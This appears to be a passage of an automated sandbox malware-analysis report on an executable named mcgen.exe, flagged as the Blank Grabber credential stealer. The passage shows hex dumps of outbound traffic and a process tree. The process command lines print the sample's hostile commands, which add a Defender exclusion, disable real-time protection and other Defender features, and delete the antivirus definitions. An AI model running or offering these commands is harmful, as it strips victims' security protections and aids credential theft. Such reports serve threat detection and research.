                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: 33 d4 94 ba a7 09 3b 3d fc dd f7 76 9d 1f a9 ef e1 b0 19 42 a5 92 f5 95 2c 7f 79 87 e2 d9 25 5d 45 9c 0a 77 4a cb 84 79 90 53 4e be 21 11 a3 e0 8c 55 38 44 bf 56 e8 ce 3b f7 2e 7d d8 89 3f e2 07 4b bb 2a aa e8 a2 15 02 34 61 4c 88 d4 9f 9f 0c 3b 80 b1 7f 20 78 62 18 5b fd a0 c3 84 a8 82 d1 8a cb e3 83 60 6c 57 d9 33 d6 ea 43 af 7c d0 f6 3f e5 8c ab 0a 32 5d 6d f7 41 a5 26 b6 93 6c 59 d5 3c 6c c7 53 9f b2 63 d4 6b 72 8c 6f b5 27 d5 23 42 ed 1f 24 f1 a3 9f 4a 4b 28 c2 2a 12 71 95 ba be a2 d2 cc de 7b ba 3f aa 85 7b 14 77 95 5c 3c 17 7c e6 de e7 08 7c 4c 25 e9 d3 6d b8 c0 af 00 d1 ad 3d ab e2 cb 34 11 5b 76 16 e5 0b 30 bf 7e 47 c6 75 86 f6 9e cd d5 66 f4 f9 34 6b 5e 53 10 8c 13 bb d7 e2 25 98 98 15 ea 2f 41 5b 93 3d 07 21 f0 65 a2 e3 c1 e4 da fc 5a 7f 1f c7
                                                                                                                                                                                                                                                                  Data Ascii: 3;=vB,y%]EwJySN!U8DV;.}?K*4aL; xb[`lW3C|?2]mA&lY<lSckro'#B$JK(*q{?{w\<||L%m=4[v0~Guf4k^S%/A[=!eZ
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: c7 03 0c f8 54 b8 0b 23 94 47 cc 1d 51 f5 28 dc 1f 8a 48 86 a6 e5 97 7a 38 e9 75 fd 8c 14 2f c8 8b 3e 88 89 da dc d9 0c 9a cd a6 95 7e a5 50 68 f5 9b 2b 36 76 ea 07 b2 92 46 d4 96 cb dc 2b e6 a1 ef 28 de 1c b8 24 c8 3d 65 62 a1 f6 c7 22 f4 66 7f 01 71 47 4e be 56 ce 36 ea a4 4c 0e 3c f1 e9 d7 fc 91 ee a2 2b 92 14 de a5 db 88 e5 93 5b 22 c0 64 24 6e d9 8f d5 46 42 38 8a 97 b5 53 c0 33 4d 7c 15 7c b7 0a 7f 77 43 3b 1d 9f 51 cd 7e f0 d8 30 57 a5 7e c6 0c b7 02 07 30 15 74 43 c0 57 ac 6f 2e be 4e b0 2b 62 99 7f b3 0b a8 9d 71 e9 37 a1 4d 98 0f f6 f7 3f 61 62 8d 74 ca 95 3c fb 8e ca de 63 2e eb 58 43 62 6c 69 b3 60 aa 24 09 35 62 24 fc c6 c2 7c f3 23 8f 37 50 4e ef f3 fe 2c 2d f0 35 01 8e 60 b1 50 08 d0 69 0b 9b 12 32 34 83 ea d7 6d 7e 0c d6 72 a5 b2 dc 46 39
                                                                                                                                                                                                                                                                  Data Ascii: T#GQ(Hz8u/>~Ph+6vF+($=eb"fqGNV6L<+["d$nFB8S3M||wC;Q~0W~0tCWo.N+bq7M?abt<c.XCbli`$5b$|#7PN,-5`Pi24m~rF9
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: f5 79 66 e3 6a 17 8b 03 62 7e 83 14 89 82 83 2e 30 5f a7 20 83 c2 54 a4 83 ae f3 e0 71 8d 14 97 ef 86 4e ea ae 5e 5b 98 7e cd 1b d0 4b 2c 4c 61 47 e7 e9 a8 d9 21 cc 99 82 8f 55 c6 f9 67 e3 1a 9c 49 e4 56 36 cf ae f4 e0 de 60 3e ff 50 23 1d 90 07 d2 ae f6 65 f1 b5 de b4 0a 74 1f 93 66 ea 50 72 b9 1a 41 38 e7 5c b3 62 18 c3 ec 60 9e 1a 8c 8b 88 17 52 6b 57 aa 20 a5 ee af 43 1c 9d a8 cc b2 05 5f e7 a1 c4 75 79 9f be 6b a4 b0 fd 30 37 a0 55 ac 83 91 22 4e 7b 81 20 70 30 17 c2 7f 83 eb b7 79 bb 20 81 2d 5e b5 9c 3c 26 d1 68 0e 73 f9 bf 3b c5 4a 66 55 40 f4 17 d3 c5 23 fe 51 12 05 e2 f1 68 60 3a 37 9a d4 63 73 3c be 2b ff 41 ef a9 73 d1 45 f1 6b 0c 1c 45 28 28 b7 f7 77 67 37 07 73 3e e2 5e 64 85 3a 15 e5 dc 70 17 68 6a c9 a8 39 fb 93 a3 9b 31 64 20 0b 54 03 4a
                                                                                                                                                                                                                                                                  Data Ascii: yfjb~.0_ TqN^[~K,LaG!UgIV6`>P#etfPrA8\b`RkW C_uyk07U"N{ p0y -^<&hs;JfU@#Qh`:7cs<+AsEkE((wg7s>^d:phj91d TJ
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: 3f d8 71 66 ba 31 a2 cf 42 96 77 1f fe 0d 16 5c 9c 46 6f c3 b9 47 d6 65 be 2e 95 85 0a b4 76 9d da ee bb b7 85 25 e3 96 6d 90 3d 17 02 65 dc 98 dc e4 8a 67 2c 3f db 2d 9c 62 54 34 96 4f bd 47 35 3a 93 2a 9d 58 b8 4a 03 c0 2c 26 c7 ac 68 ae a8 a2 6b 44 1c 6f 01 b3 c2 8a d5 68 0d 23 9a e3 db 90 98 9b b4 5c 04 91 87 f8 c7 6b 20 ec f7 b8 42 c8 df 53 4a 84 ab f6 e1 66 9e 43 5a 07 d1 bf 53 f0 e3 2f 28 67 bd a7 38 5a cb e8 f0 98 30 86 e0 45 4c 6d fe 31 b3 ef 16 c5 70 97 dd af 18 9e 60 bb f7 8a 3b 76 8a bd e0 a2 00 6a 05 d4 d3 ec 5e 29 ea 02 8e bf c3 23 75 c8 57 37 bd 01 aa f1 6a 36 76 e9 9c 7f 3b 3f 55 6c 69 99 9b a2 c6 4b ba 6c 0c 6d 94 66 89 6c d7 c8 00 a4 59 57 a1 91 f7 c8 25 14 3c ec 13 8a 29 5b 8e 2a 2e 56 a2 ac f7 d1 bc e4 c5 a5 02 5f 1a 9c 03 59 59 41 88
                                                                                                                                                                                                                                                                  Data Ascii: ?qf1Bw\FoGe.v%m=eg,?-bT4OG5:*XJ,&hkDoh#\k BSJfCZS/(g8Z0ELm1p`;vj^)#uW7j6v;?UliKlmflYW%<)[*.V_YYA
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: d1 06 5a e9 4a a3 d4 e8 cf 76 e7 b8 17 68 2c b5 d1 e7 bf 16 d3 e7 c2 65 ec 51 42 dd 65 de eb 1b 53 6f ee 72 5d ea 13 b8 6a 52 49 46 3f b7 de 56 4a f9 91 ee 54 0d 2c d9 68 e6 97 13 c4 1b 47 23 07 d2 4b f2 4e cc 5f 56 b7 92 4d 2d cb 59 f3 31 69 52 99 44 04 21 cd f8 1b 13 00 93 84 84 f2 81 7f e1 f9 41 75 7d c2 51 32 5f 3e 9b 31 e6 8e ee 3f a1 ce 0a 31 47 82 0f 4e 2a 1c 22 6f bc cb b5 35 7f 3c 09 0d cc df 64 d3 97 2c 42 9b 36 e7 58 01 08 88 cc 88 bb 6e 02 bc 63 ee 24 67 44 4a b9 ec ea fb 2d 43 70 e6 d0 1e 76 e6 bf 34 eb eb 6c 55 b6 25 c8 52 d0 50 ce b2 66 8f de da 35 88 2e 23 89 85 21 92 40 59 cb c9 da f7 73 e3 ba e1 17 27 ac 84 9e ad f7 a8 36 a1 b5 e4 72 1e ae 56 93 e3 86 9b 0b 24 cf 8b 87 92 86 d1 71 a7 7d cc f9 7f 33 16 10 f1 4a 63 ac 0a 6d 4d c7 b9 de ae
                                                                                                                                                                                                                                                                  Data Ascii: ZJvh,eQBeSor]jRIF?VJT,hG#KN_VM-Y1iRD!Au}Q2_>1?1GN*"o5<d,B6Xnc$gDJ-Cpv4lU%RPf5.#!@Ys'6rV$q}3JcmM
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: 78 3b 95 dd 7f fe 4b d9 4d 97 43 70 86 d9 5b 65 88 80 65 6a 77 21 6d 2c e4 27 40 9f 48 07 89 42 de 7a 7a c3 f1 95 5d e0 f6 cb 85 84 db 05 7d 13 51 6c 2d 36 ff b1 61 e2 be 97 d7 d8 6d f2 c5 b8 75 1b 05 a4 d4 88 8a 5a fa f9 39 d8 4c 6c 5f 77 d6 e4 f3 22 a3 8b c9 0f 4b 2e eb af 67 f7 51 c2 63 5f 3a 7d b0 68 33 7c 10 eb b6 eb 49 cb 5d d5 53 20 c9 97 97 64 e0 5a 59 f5 73 92 79 89 60 bc c3 d2 25 e7 df aa 34 6c 7e 1f f7 ef c8 e1 99 0f 74 6d 68 3f 58 a2 48 32 56 08 59 65 8c a0 b9 18 6f 84 21 97 85 67 da cb 69 cc 7e 8d ec d1 3d cf e1 ec cb 76 04 ef d0 43 cc 8b 4d 3e 4c 8d 40 df d2 de 7b 4f d2 54 85 ed ba 66 e0 75 3c 3e 7a f5 9b 25 26 54 e7 6e df 4b 36 c3 9f fe 04 90 82 d1 1b d8 6d 30 44 b6 94 4e e9 61 d6 b6 52 30 62 49 33 7d 32 45 65 79 69 24 72 e2 49 e3 6a 41 ca
                                                                                                                                                                                                                                                                  Data Ascii: x;KMCp[eejw!m,'@HBzz]}Ql-6amuZ9Ll_w"K.gQc_:}h3|I]S dZYsy`%4l~tmh?XH2VYeo!gi~=vCM>L@{OTfu<>z%&TnK6m0DNaR0bI3}2Eeyi$rIjA
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: 48 bb 32 6c 68 9f f0 87 6b 6b a0 81 54 7a d4 64 1d 01 9f a1 88 6a 63 47 08 02 f7 28 ab f1 8f 8a ee e1 c7 f7 40 26 55 e4 6d 90 18 c7 cc 72 21 7a 19 4a 47 da 94 a8 10 dc 81 f9 ac 64 72 3e 6d 08 6f 65 39 98 29 ec 30 a4 20 94 e6 f0 cd 92 0c b1 28 e3 f1 27 6f 42 fc 47 e0 30 c8 87 84 6a 53 c2 34 e0 8d be 58 e6 ae e9 1d 7a d5 86 26 b9 81 b4 c2 69 6e 1c 8a da 2f 31 e9 31 de 0d 7f 72 56 5d 44 08 41 62 0d 59 c3 c7 01 2d 68 13 2c 23 c8 2f a8 f9 16 ec 17 0c ae c7 25 cf ff 64 45 3b 09 25 0c d2 ec cc bd 01 b8 bc 57 83 64 54 65 c0 fa d9 91 77 2d 99 60 72 4d 34 b4 a0 fb e5 c1 91 56 36 aa 1c 92 76 40 d2 06 7a 0c 9a 18 29 5d d4 6e a1 37 4a 02 90 a7 74 24 5c 32 0b b5 9e ab 38 f6 01 ae 1b 6c 51 11 9d 55 de 49 d0 15 0a 69 1b 8e 80 c6 d4 10 34 be 78 20 07 c1 8e 45 27 e0 46 d9
                                                                                                                                                                                                                                                                  Data Ascii: H2lhkkTzdjcG(@&Umr!zJGdr>moe9)0 ('oBG0jS4Xz&in/11rV]DAbY-h,#/%dE;%WdTew-`rM4V6v@z)]n7Jt$\28lQUIi4x E'F
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: d7 83 fd 39 38 48 cf 16 7b c2 34 52 1e d4 0b ab 29 32 62 ba fc 38 4f 8b 83 08 5d d3 ed de fb 1d 6b d9 d0 f4 42 cf e0 a1 cc 54 44 9e 63 f1 ce b7 3b 92 3d e7 e8 f6 4d 3c 26 31 86 e1 76 ea 84 73 6d 11 b3 3f 06 ce 19 ee f8 d9 a3 98 fe 04 be 6b b4 47 5d d9 25 48 35 4b a7 99 e2 af 70 df df 80 30 90 5d da 86 85 2d e7 5d 99 d0 b9 73 f9 00 ff d7 62 fd f3 f8 e4 a8 e8 58 89 0e 96 0b 32 96 a1 0b cf 93 71 4b 61 75 69 1a ce 45 39 09 ab 90 82 1f 93 46 5d 18 31 e8 f1 17 0a 0a 4f 23 1f 2e 55 56 ff ad 30 a7 92 59 b2 a9 e3 cb 25 09 44 c1 5e 52 c4 ff fc 4c 54 4d 6e b5 72 e2 63 10 a5 78 40 9b bb 7f 8b 17 20 70 38 15 8e 63 8a a7 ab a5 52 e3 79 30 94 98 07 1d 39 85 16 00 0c 0d 0b 06 24 64 d0 59 c8 7a 3d 75 4f c5 1b f2 4c b6 66 80 8a 9a 4e bb 65 d9 96 7f f6 5e 91 7b 60 11 58 67
                                                                                                                                                                                                                                                                  Data Ascii: 98H{4R)2b8O]kBTDc;=M<&1vsm?kG]%H5Kp0]-]sbX2qKauiE9F]1O#.UV0Y%D^RLTMnrcx@ p8cRy09$dYz=uOLfNe^{`Xg
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: c5 7a 1e c8 06 bf 43 96 d4 ea 8e df fb b2 80 52 6e 07 f7 91 60 76 13 5e 3a c3 44 ce 54 01 c4 86 61 7d cc 97 29 96 78 d4 79 97 59 02 3a 7d 58 bc 50 20 52 d4 59 2f 5d f3 8d 9f 50 3a cb f1 eb c0 73 8a 15 ed 6e 29 83 1d 46 04 31 26 0c ef 1d 24 48 49 c5 49 d2 79 18 25 1c 0d 61 7c d7 06 89 fa 9f e0 31 d0 4b 35 df 46 19 e0 ff 72 fa 13 07 dc 4a 28 2e c9 82 b9 ca 65 79 9d e0 f9 a8 fc c5 ca dd fe ba 57 64 f2 8d 8c e4 94 a0 ce 28 30 02 80 44 83 55 f0 54 16 dc 8a 6f 17 24 ee 72 a8 62 5a 49 13 7f 0f 80 43 da 20 0f 69 6c de 82 ca 50 e6 79 68 70 cf 2c 07 8c 08 95 06 9b 71 72 ca 0e e0 56 3c 14 f2 3e b7 35 7b 8c 21 64 11 10 91 f5 d6 14 e9 a0 b9 bb 60 90 0e d8 3c 4b f1 20 dd da 30 53 c8 c3 72 70 cf 83 d8 63 16 d2 a6 ba 3d ad 7e 8a fa a1 c6 46 49 42 fe 63 c4 87 68 33 2f b1
                                                                                                                                                                                                                                                                  Data Ascii: zCRn`v^:DTa})xyY:}XP RY/]P:sn)F1&$HIIy%a|1K5FrJ(.eyWd(0DUTo$rbZIC ilPyhp,qrV<>5{!d`<K 0Srpc=~FIBch3/
                                                                                                                                                                                                                                                                  2025-01-02 08:22:41 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                  Date: Thu, 02 Jan 2025 08:22:41 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                  Content-Length: 1699
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:03:22:00
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\mcgen.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b9f10000
                                                                                                                                                                                                                                                                  File size:8'042'981 bytes
                                                                                                                                                                                                                                                                  MD5 hash:211DA2D6A5B8B04B49D1C837EECEE46C
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                  Start time:03:22:01
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\mcgen.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b9f10000
                                                                                                                                                                                                                                                                  File size:8'042'981 bytes
                                                                                                                                                                                                                                                                  MD5 hash:211DA2D6A5B8B04B49D1C837EECEE46C
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b4290000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                  Start time:03:22:03
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
